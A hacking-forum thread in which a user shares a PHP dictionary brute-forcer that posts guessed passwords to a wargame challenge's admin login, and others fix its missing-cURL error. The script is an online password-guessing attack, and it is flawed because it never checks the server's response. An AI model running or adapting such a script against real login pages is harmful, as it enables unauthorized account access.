Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

For those who know php

Banned
0 0

Ok, I have a nice lil bruteforcer in php, but im getting an error - Fatal error: Call to undefined function curl_init() in /hd2/djcsites/i love hbh. keep up the good work!.com/thethreecats/bruteforcer.php on line 6

What can I do to fix it? and yes, I did look at other people's codes and got the ideas from other people's source. here is my code:

<body>
<?php
  $fh = fopen("dic.txt", "r");
  while(!feof($fh)) {
   $curl = curl_init();
   $pass = fgets($fh,1024);
   $data = fread($fh, filesize('dic.txt'));

curl_setopt($curl, 

CURLOPT_URL,"http://hellboundhackers.org/challenges/real8/admin.php");
   curl_setopt($curl, CURLOPT_POST, 1);
   curl_setopt($curl, CURLOPT_POSTFIELDS, 

"Uname=admin&Pword=$pass&Submit=True");

curl_exec ($curl);
   curl_close ($curl);

$result = eregi("Incorrect", $data);
   if ( $result == 0 ) {
    echo "$pass is the password!";
   break;
  fclose($fh);
  }
}

?>

<p /> Again!
</body>
</html>```

0 0

Well, the error you're getting is that PHP doesn't recognize the function on line 6, curl_init(). The only reason I can think of that occuring is if you're running a version of PHP before 4.0.3, since that's when the function came about. But that's really old…are you running on a commercial server or off of a private home one?

The Manager
0 0

the server you are running that off of does not have curl installed on it. easy as that.

0 0

AldarHawk wrote: the server you are running that off of does not have curl installed on it. easy as that.

smacks forehead yeah, I guess that makes sense :P…I've never dealt with a server that didn't have CURL on it, so I never realized that it wasn't built in. Just goes to show how much I know… :P

From PHP.NET… Requirements

In order to use PHP's CURL functions you need to install the libcurl package. PHP requires that you use libcurl 7.0.2-beta or higher. In PHP 4.2.3, you will need libcurl version 7.9.0 or higher. From PHP 4.3.0, you will need a libcurl version that's 7.9.8 or higher. PHP 5.0.0 requires a libcurl version 7.10.5 or greater.

0 0

If you need hosting with any specific PHP modules, drop me a PM. We can discuss rates to fit.

Banned
0 0

AldarHawk wrote: the server you are running that off of does not have curl installed on it. easy as that.

Logical. I may just host my own, Currently I have a i love hbh. keep up the good work! site for all my scripts and stuff I use.

0 0

Download EasyPHP.